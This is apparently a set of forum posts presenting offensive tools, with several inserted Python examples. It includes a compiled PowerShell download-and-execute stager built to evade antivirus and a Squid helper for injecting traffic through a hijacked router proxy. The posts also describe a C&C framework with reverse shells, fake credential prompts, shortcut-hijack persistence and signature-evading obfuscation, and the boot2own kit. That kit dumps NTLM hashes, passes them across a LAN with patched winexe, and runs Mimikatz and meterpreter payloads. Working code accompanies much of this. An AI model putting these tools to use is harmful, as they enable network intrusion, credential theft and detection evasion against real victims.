Posts by xor-function
  1. I just wanted to let everybody here know about ps2exe, if you don't already. You can find it on TechNet if you search for it. What it does is compile a script to an executable by using a C# source code template that runs the script using the System.Management.Automation assembly. Since it uses a class library, it stands a pretty good chance of bypassing any restrictions on the PowerShell.exe program file. This is an example script I compiled using ps2exe:

         function start-download {
             # Accept any server certificate (the download host uses a self-signed cert)
             [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
             # Download the script text and run it in memory, nothing touches disk
             IEX (New-Object System.Net.WebClient).DownloadString('https://some-domain.com/ps-script.ps1')
             # Restore default validation: $null, not { $false }, which would reject every certificate afterwards
             [System.Net.ServicePointManager]::ServerCertificateValidationCallback = $null
         }
         start-download

     This way you can change the code server-side without having to recompile the binary, unless you need to change the URL. So far AV doesn't light up and it seems to be working in Windows 10.
  2. Check if your router's admin menu contains settings for an HTTP proxy, and input the info of a proxy server you control (VPS). Once this is done, all regular HTTP traffic will be forwarded to this proxy. You could then start capturing traffic from the router on the proxy. Taking this further, you can inject traffic from the proxy server. On Squid you can enable a URL rewrite program (you have to create this program). I found using an HTTP proxy, without touching HTTPS, works well. This is pretty much what many organizations do to their internal network (content filter). I've found that when tampering with DNS, the individual can get stuck in a redirection loop, or some client-side scripts for the web page you are trying to spoof are hosted on that very domain, so they aren't loaded by the web browser, which alerts them to a problem.
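The URL rewrite program the post says you have to write yourself, as an added example (Python, not the poster's code) of the injection step: it speaks Squid's url_rewrite_program helper protocol on stdin/stdout, rewrites only the URLs that match a rule and answers ERR for everything else, so the resources a spoofed page loads from its own domain still come from the real server and the browser has nothing to complain about. The rule table, the 198.51.100.10 injection host and the request lines used for testing are constructed for the example.

```python
#!/usr/bin/env python3
"""Minimal Squid url_rewrite_program helper (added example, not Squid's or the poster's code).

Squid feeds one request per line on stdin:
    [channel-ID] URL client_ip/fqdn ident method [kv-pairs]
and expects exactly one reply line per request (Squid 3.4+ format):
    [channel-ID] OK rewrite-url=<new-url>   rewrite transparently, client never sees a redirect
    [channel-ID] ERR                        leave the request alone
Only plain HTTP reaches a URL rewriter; HTTPS arrives as CONNECT host:443 and is tunnelled untouched.
"""
import sys
from urllib.parse import urlsplit, urlunsplit

# Constructed rules for the example: (host to hijack, path prefix, replacement origin).
# Only matching resources are rewritten; everything else on the same domain loads from the real
# server, which avoids the "scripts hosted on that very domain are missing" failure of DNS spoofing.
RULES = [
    ("www.example.com", "/js/", "http://198.51.100.10/inject/"),
    ("updates.example.net", "/", "http://198.51.100.10/fake-updates/"),
]


def rewrite_url(url, rules=RULES):
    """Return the replacement URL for `url`, or None if no rule applies."""
    parts = urlsplit(url)
    if parts.scheme != "http":          # never touch https:// (or the host:port of a CONNECT)
        return None
    for host, prefix, target in rules:
        if parts.hostname == host and parts.path.startswith(prefix):
            t = urlsplit(target)
            new_path = t.path.rstrip("/") + "/" + parts.path[len(prefix):]
            return urlunsplit((t.scheme, t.netloc, new_path, parts.query, ""))
    return None


def handle_line(line, rules=RULES):
    """Parse one helper-protocol request line and build the reply line."""
    fields = line.strip().split()
    if not fields:
        return "ERR"
    channel = ""
    if fields[0].isdigit():             # concurrency=N enabled: first token is the channel id
        channel = fields.pop(0) + " "
    url = fields[0]
    method = fields[3] if len(fields) > 3 else ""
    if method.upper() == "CONNECT":     # HTTPS tunnel: there is no URL to rewrite
        return channel + "ERR"
    new = rewrite_url(url, rules)
    return channel + ("OK rewrite-url=" + new if new else "ERR")


def main():
    # Flush after every line: Squid blocks until it gets the reply for each request.
    for line in sys.stdin:
        sys.stdout.write(handle_line(line) + "\n")
        sys.stdout.flush()


if __name__ == "__main__":
    main()
```

Wire it in with `url_rewrite_program /usr/local/bin/rewrite.py` in squid.conf; if you also set `url_rewrite_children ... concurrency=N`, Squid prefixes each request with a channel ID, which the helper echoes back. Squid versions before 3.4 expect the bare rewritten URL (or an empty line) instead of the OK/ERR replies shown here.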
  3. Fathomless has been a project I have been working on and includes some new tools. Running environment is Ubuntu 14.04 LTS. Updated the description below to include recent changes.

     Async Shell Handler: provides a prototype C&C web server along with an asynchronous PowerShell client and a basic command interface. The server is hosted on a lighttpd server using HTTPS with a self-signed certificate. Since the C&C is a CGI hosted on a lighttpd server, you can edit the included lighttpd.conf to only allow connections from the expected IP range. The async client performs basic key fingerprint comparison for the self-signed cert and basic authentication to the C&C. These values are randomly generated upon installation. All requests and responses from the client are performed via HTTPS GET requests with URL-safe base64 encoded strings. The client initially operates in memory, so if it exits or the system reboots the process will be terminated and flushed from memory. Limited persistence has been added via the shortcut-inject function available in the async and TCP PowerShell clients. The TCP reverse shell version of the client does not require the C&C component, just an open TCP port with netcat, e.g.: nc -lvvp 443

     Available functions from the client:
     * get-info: displays a summary of the current host.
     * exec-script "name-of-script": executes a script hosted server-side in /var/async-shell/ps-scripts via IEX; requires the name of the script file as a parameter.
     * obfuscate "name of text file / script": uses a polyalphabetic obfuscation method on base64 strings, writes the obfuscated string to a file and provides a de-obfuscation key.
     * de-obfuscate "(name of text file / script), (key)": performs the inverse of the obfuscate function; requires the text file with the obfuscated base64 data and the de-obfuscation key as parameters.
     * gen-key: generates a random alphabetic string for use with the obfuscate-base64 function.
     * obfuscate-base64 "(action: hide or clear), (key: obfuscation or de-obfuscation), (base64-string)": the function that contains the obfuscation engine; it works only with clear base64 data.
     * byte-encode (binary-to-obfuscate, key): performs byte-encoding prior to converting to obfuscated base64; provide the key for de-obfuscation.
     * byte-decode (file-containing-obfu-base64, key): performs the reverse of byte-encode; requires the de-obfuscation key.
     * askfor-creds: performs some social engineering in order to acquire plain-text credentials. This is done by generating an authentication popup which seems to reconnect to a network share.
     * gen-enccmd "your command string": generates a PowerShell formatted encoded command. Ensure you quote your command string, e.g.: gen-enccmd "cmd /c ipconfig /all"
     * shortcut-inject "name-of-lnk" "Url-hosting-script": modifies the specified shortcut to run the original program and also execute a download-and-execute command string, e.g.: "Google Chrome.lnk" "full url to powershell script". Requires the http:// or https:// in the URL.
     * gen-obfuscated: enables execution of a command string on systems while evading countermeasures, specifically AV signature-based detection. This is accomplished by focusing on obfuscating command strings that typically download a short script involved in first-stage/initial access.

     boot2own: live OS that dumps hashes and uses them with winexe to execute commands on remote systems. I haven't updated it yet since I have been waiting for UEFI support to mature (shim & preloader). Once that happens I will invest time in it.

     Find it on github (.) com/xor-function/fathomless. Let me know if you run into issues.
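An added example, in Python rather than the client's PowerShell, of two of the transforms listed above: a polyalphabetic shift over the base64 alphabet that behaves like obfuscate-base64 driven by a gen-key style key, and the UTF-16LE base64 that gen-enccmd's -EncodedCommand output has to use. The post does not give Fathomless's actual obfuscation scheme, so the Vigenère-style shift here is an assumption used to illustrate the idea, not the project's code; the "whoami" and "cmd /c ipconfig /all" inputs are just sample commands.

```python
#!/usr/bin/env python3
"""Added example: base64-alphabet polyalphabetic obfuscation and -EncodedCommand encoding.

The Fathomless client is PowerShell; these functions are an independent illustration.
The exact scheme the project uses is not described in the post, so the Vigenere-style
shift below is an assumption, not its algorithm.
"""
import base64
import secrets
import string

B64_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
_INDEX = {c: i for i, c in enumerate(B64_ALPHABET)}


def gen_key(length=16):
    """Random alphabetic key; letters only, so it pastes safely into a command line."""
    return "".join(secrets.choice(string.ascii_letters) for _ in range(length))


def obfuscate_base64(action, key, b64):
    """Shift each base64 symbol by the alphabet index of the matching key symbol (key repeats).

    action="hide" applies the shift, action="clear" reverses it. '=' padding is left alone
    and the key index is not advanced over it, so hide/clear stay symmetric and the result
    is still a well-formed base64 string (it does not stand out by shape to a scanner).
    """
    if action not in ("hide", "clear"):
        raise ValueError("action must be 'hide' or 'clear'")
    if not key or any(k not in _INDEX for k in key):
        raise ValueError("key must be non-empty and drawn from the base64 alphabet")
    sign = 1 if action == "hide" else -1
    out = []
    ki = 0
    for ch in b64:
        if ch == "=":
            out.append(ch)
            continue
        if ch not in _INDEX:
            raise ValueError(f"not a base64 symbol: {ch!r}")
        shift = _INDEX[key[ki % len(key)]]
        out.append(B64_ALPHABET[(_INDEX[ch] + sign * shift) % 64])
        ki += 1
    return "".join(out)


def gen_enccmd(command):
    """powershell -EncodedCommand expects base64 of the UTF-16LE command text, not UTF-8."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def obfuscated_stage(command, key):
    """Encode a command and hide the (very recognisable) encoded form behind the key."""
    return obfuscate_base64("hide", key, gen_enccmd(command))


def recover_stage(blob, key):
    """Inverse of obfuscated_stage: clear the shift, then decode the UTF-16LE base64."""
    enc = obfuscate_base64("clear", key, blob)
    return base64.b64decode(enc).decode("utf-16-le")


if __name__ == "__main__":
    k = gen_key()
    blob = obfuscated_stage("cmd /c ipconfig /all", k)   # sample command, not a real stager
    print("key:      ", k)
    print("blob:     ", blob)
    print("recovered:", recover_stage(blob, k))
```

The key is not a secret in any cryptographic sense: a 64-symbol shift cipher falls to frequency analysis in seconds. What it buys is only that the blob no longer matches a static signature for the encoded command (the "dwBoAG8A..." prefix of a UTF-16LE "whoami" is a classic one), which is all the post claims for it.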
  4. Most attacks on encryption center on stealing the private key or weakening it by sabotaging the PRNG functions used by key generators in a target software implementation. This is most easily done by bribing developers, so it then becomes a "DOJ feature", not a weakness. A direct computational attack on public-key encryption requires factorization of the public key to acquire the private key. With today's supercomputers, keys over 2048 bits are not possible to acquire through factorization within a practical time frame. Why blow billions of dollars to maybe crack something on experimental tech, when you can buy and/or create a software exploit for a few hundred grand (Vupen, Hacking Team, etc.) in order to steal the private key? You probably don't even need an exploit, just malware (0-day viruses), but that's another thread.
  5. I added a download link for a demo ISO. It's in the README of the boot2own git repo posted above for anyone that's interested. Let me know if you have any issues. I've also thought about decreasing the time for PXE booting. The way that would work would be by booting the PLOP boot manager (plpbt.bin is around 50 KB) instantly over PXE, bypassing any locked BIOS to use a live USB. The catch is that live USB sticks need to remain attached to the PC. To get around this, copy the entire file system to RAM; now removing the USB after boot would not affect the live OS session. I might be able to get the load time down noticeably. Then continue as before. To do this on CrunchBang would require a patch to the initrd.img; maybe use debirf to generate a custom initrd to avoid patches? I might add Slax to the mix as copy2ram is a supported feature that apparently only requires 320 MB of RAM to work. I have been messing with it and so far it's just dependencies that are a problem. I'll update the git repo when I figure something out and have time to build it.
  6. The code is public; do the necessary testing to be confident yourself. So far the concept seems to be more than theory. I already have boot disk/USB/PXE prototypes. Obviously this still needs live testing, but this is a good start.
  7. Let me expand further on how this is used. What is automated is the immediate extraction of NTLM hashes from the local admin. How this is used by the patched winexe binary is up to you. Some example payloads using PowerShell are provided, but this is just to convey what can be done. Here is a screenshot of the terminal menu of the live OS. Once an option is selected, the execution run is automated. If you don't want that, then before generating the ISO, edit b2o-autopwn.sh to select an option automatically with your customization. It's designed to be customized; that's why there is no ISO provided, only build scripts. This toolkit is for a tester that is able to infiltrate the physical location of the client's network; it doesn't need to be the server room to get a SYSTEM level foothold (janitorial dept workstation). It is made to do this rather quickly. So if a tester is able to gain entry to a client's building for about 20 min, ideally 10 min, you know what can come next. This is designed to bypass: USB protections, BIOS protections (it's usually locked to PXE boot), firewall protections, IDS and AV (ARP used once / winexe). Cleaning up is easy as most is done in memory.
  8. A rogue DHCP server is not used on their network, as you would not want this being served to random users, only the accessed workstation in front of the tester. But PXE is still used... This is accomplished by employing an SoC device (Raspberry Pi/BeagleBone) or laptop and using a short Ethernet patch cable directly into the machine from the device/laptop. Here is an example. This, obviously, can be configured in a more discreet manner. Once the OS is loaded, just reconnect the workstation back to the original network. Use a device with a gigabit Ethernet port for speed (about 3 min); otherwise it could take 10 min to load the OS.
  9. After looking around, it seems this forum is pretty balanced morally but also innovative, so I decided to present this toolkit here. It started out as something simple but grew quickly. Let me know if it has any bugs and what you think of this, thoughts, opinions. I know there will be many typos. It's on GitHub as the repo boot2own under user xor-function: github(dot)com / xor-function / boot2own

     The contents of the ABOUT file (apologies in advance if this is not the proper place for this):

     SUMMARY

     B2O is a toolkit that generates a live OS from a CrunchBang ISO. From this live environment, attacks are performed on the HDD to gain NTLM hashes to leverage in additional attacks against a network.

     Used crunchbang-11-20130506-i686.iso successfully to generate the live CD. Used Ubuntu Server x86 12.04 successfully to compile the patched winexe, so use Ubuntu Server/Desktop x86 12.04 to compile the binary for the i686 CrunchBang ISO. Tested only on a hard drive with Windows 7 installed.

     SHELL SCRIPTS:
     b2o-compile.sh: compiles the patched winexe binaries that allow hash passing.
     b2o-isogen.sh: uses a CrunchBang ISO to generate a remastered ISO live OS (B2O) with the automated attack tools.
     b2o-pxe.sh: creates a PXE server that serves the remastered B2O live OS.
     b2o-listener.sh: starts a meterpreter listener with the configured options to msfconsole; use with option 3 in the B2O live OS. (Requires Metasploit to be installed along with system_migrate.rb.)
     b2o-autopwn.sh: attack engine; this script only runs in the live OS environment and provides a terminal menu with automated attack options.

     LIVE OS:

     The live OS chosen is CrunchBang Linux (I like it). The live filesystem is a squashfs filesystem. To remaster/mod it, install squashfs-tools and genisoimage. To make a live USB use UNetbootin, as the dd method fails.

     The expanded filesystem.squashfs was mounted and chrooted into to install the following packages: arp-scan, lighttpd.

     The core files that make the B2O live environment:

         root
         └── boot-2-own
             ├── boot2own-autopwn.sh
             ├── creddump
             │   ├── cachedump.py
             │   ├── CHANGELOG
             │   ├── COPYING
             │   ├── framework
             │   ├── lsadump.py
             │   ├── pwdump.py
             │   └── README
             ├── CREDITS-B2O
             └── pwinexe

     A terminator shell is loaded on boot by modding /etc/skel/.config/openbox/autostart; the following line was appended to the autostart file:

         terminator --geometry=750x600 -e 'sudo /bin/bash -c /root/boot-2-own/b2o-autopwn.sh' &

     Once B2O is booted up on a domain computer, boot2own-autopwn.sh automatically mounts the hard drive and then reads the local hashes using creddump (written by Brendan Dolan-Gavitt). Booting a live OS on a computer can be done from a USB device, but a more promising method is PXE. This is practical as it is simple to make an ARM SoC (BeagleBone/Raspberry Pi) serve B2O over PXE. Also there is no need to leave any physical media attached to the used PC after the OS is loaded into RAM. Once booted, it singles out the local administrator user name and its corresponding NTLM hash and imports these as variables. Winexe is one of the only programs that enable CLI interaction with Windows computers from Linux. Unlike Psexec, it does not pass hashes. I used the samba-hashpass.patch from the smbexec project (Eric Milam & Martin Bos) and created a custom build/compile script to create a patched winexe binary (renamed to pwinexe to prevent confusion). Now the user and hash variables can be passed to a function using pwinexe for additional machine access.

     The patched winexe also has the option to run as SYSTEM, along with the option to uninstall itself from the machine upon command completion.

     POST EXPLOITATION

     Once the local admin username and hash are retrieved, boot2own-autopwn.sh acquires the IP addresses of other computers in the LAN using arp-scan. Once this is done, you are presented with payload options for pwinexe. I chose PowerShell as the attacks can be completely in memory. This makes forensics and IR quite difficult, especially since the attack platform itself is in memory (boot disk/PXE). This seems to be the least likely method to be caught by AV solutions, although to reduce the chance of detection further one can try obfuscation: base64 encoding after adding unused random variables into the command string. The PS payloads used in B2O are Invoke-Mimikatz (written by Joe Bialek) and Invoke-Shellcode (written by Matthew Graeber); both are part of PowerSploit. More details about these scripts are located in the credits. To use these payloads without writing to disk, they must not be copied over prior to use. To ensure the PowerShell payloads are only run in memory, I employed a lighttpd web server to host the payloads. Now they can be retrieved and copied to an expression or variable in memory before execution.

     The Auto-Off option: this is an optional feature that powers off the live OS session after a selected payload finishes performing an execution run on the detected IPs in the LAN. This can be useful as one can turn off the monitor, then leave and let the live OS session power itself off after it finishes its run.

     Invoke-Mimikatz reflectively loads Mimikatz in memory using PowerShell, allowing the ability to acquire plain-text passwords; the results are copied to the file /root/loot in the B2O live filesystem. To rsync/HTTP PUT-GET this file through Tor/I2P/etc. to an external server, just append the necessary code before the while loop ends at the bottom of boot2own-autopwn.sh.

     Invoke-Shellcode makes it possible to have reverse SYSTEM shells connect to the specified IP or domain. It depends on the MSF windows/meterpreter/reverse_https multi handler. It also depends on a modified version of smart_migrate, a Metasploit manage module. The modified module is named system_migrate.rb and is included in the folder. Its priority is to migrate out of PowerShell to an existing NT AUTHORITY\SYSTEM process to maintain this permission level. If it is not able to migrate out of PowerShell, the patched winexe process will hang as PowerShell remains active.

     CAVEATS

     All of the following parameters must exist for success:
       • The victim network's IT department uses the local administrator user account on domain computers.
       • There is no hard disk encryption being used on the selected workstation.
       • Their workstations boot to PXE or their BIOS is unlocked.
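The selection step the ABOUT file describes (read the creddump output, single out the local administrator and its NTLM hash, list the LAN hosts arp-scan found, and hand them to pwinexe), as an added Python example rather than the project's own b2o-autopwn.sh. The pwdump and arp-scan outputs are constructed samples in those tools' line formats, not captured data; the RID-500 rule picks the built-in administrator even when the account has been renamed, which matching on the name "Administrator" would miss. The LM:NT form in pwinexe's password field is assumed here from the smbexec patch convention and is marked as such in the code; --system and --uninstall are stock winexe options.

```python
#!/usr/bin/env python3
"""Added example: the hash-selection and target-listing step automated by boot2own-autopwn.sh.

Input formats are those of the tools the ABOUT file names: creddump's pwdump.py prints one
account per line as  user:rid:lmhash:nthash:::  and arp-scan prints one host per line as
ip<TAB>mac<TAB>vendor  between a header and a footer. All samples below are constructed.
"""
import ipaddress
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash when LM storage is disabled (the usual case)
HEX32 = re.compile(r"^[0-9a-f]{32}$", re.I)

# Constructed pwdump.py-style output; the built-in admin (RID 500) has been renamed "ITadmin".
SAMPLE_PWDUMP = """\
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ITadmin:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
jsmith:1001:aad3b435b51404eeaad3b435b51404ee:5835048ce94ad0564e29a924a03510ef:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
"""

# Constructed arp-scan output for a /24 (tabs separate the columns, as arp-scan prints them).
SAMPLE_ARP = """\
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.8.1 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.1.1\t00:11:22:33:44:55\tRouter Vendor
192.168.1.20\t00:11:22:33:44:66\tDell Inc.
192.168.1.21\t00:11:22:33:44:77\tDell Inc.
192.168.1.22\t00:11:22:33:44:88\tHewlett Packard

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.8.1: 256 hosts scanned in 1.432 seconds (178.77 hosts/sec). 4 responded
"""


def parse_pwdump(text):
    """Yield (user, rid, lm, nt) for each well-formed pwdump line; skip anything else."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        if HEX32.match(lm) and HEX32.match(nt):
            yield user, rid, lm, nt


def select_local_admin(text):
    """Pick the built-in Administrator by RID 500, not by name (the name may be changed)."""
    for user, rid, lm, nt in parse_pwdump(text):
        if rid == 500:
            return user, lm, nt
    raise LookupError("no RID-500 account in dump")


def parse_arp_scan(text, exclude=()):
    """Return the responding IPs, minus any in `exclude` (e.g. the gateway)."""
    hosts = []
    for line in text.splitlines():
        cols = line.split("\t")
        if len(cols) < 2:               # header/footer lines have no tab-separated columns
            continue
        try:
            ip = ipaddress.ip_address(cols[0])
        except ValueError:
            continue
        if str(ip) not in exclude:
            hosts.append(str(ip))
    return hosts


def pwinexe_argv(user, lm, nt, target, command, as_system=True, uninstall=True):
    """argv for the hash-passing winexe build.

    --system and --uninstall are stock winexe options. The LM:NT value in the password
    position is an ASSUMPTION (the smbexec patch convention); verify it against the
    patch you compiled before relying on this exact format.
    """
    argv = ["pwinexe", "-U", f"{user}%{lm}:{nt}"]
    if as_system:
        argv.append("--system")
    if uninstall:
        argv.append("--uninstall")
    argv += [f"//{target}", command]
    return argv


def plan(pwdump_text, arp_text, command, exclude=()):
    """One pwinexe invocation per discovered host, all with the local admin's hash."""
    user, lm, nt = select_local_admin(pwdump_text)
    return [pwinexe_argv(user, lm, nt, ip, command) for ip in parse_arp_scan(arp_text, exclude)]


if __name__ == "__main__":
    for argv in plan(SAMPLE_PWDUMP, SAMPLE_ARP, "cmd /c whoami", exclude=("192.168.1.1",)):
        print(" ".join(argv))
```

Two details worth keeping from this even if the rest is replaced by the shell script: filter on RID rather than account name, and validate that both hash fields are 32 hex characters before using them, since creddump prints a placeholder rather than a hash when a hive is damaged or the account has no NT hash, and a malformed credential makes every pwinexe run fail noisily against every host in the list.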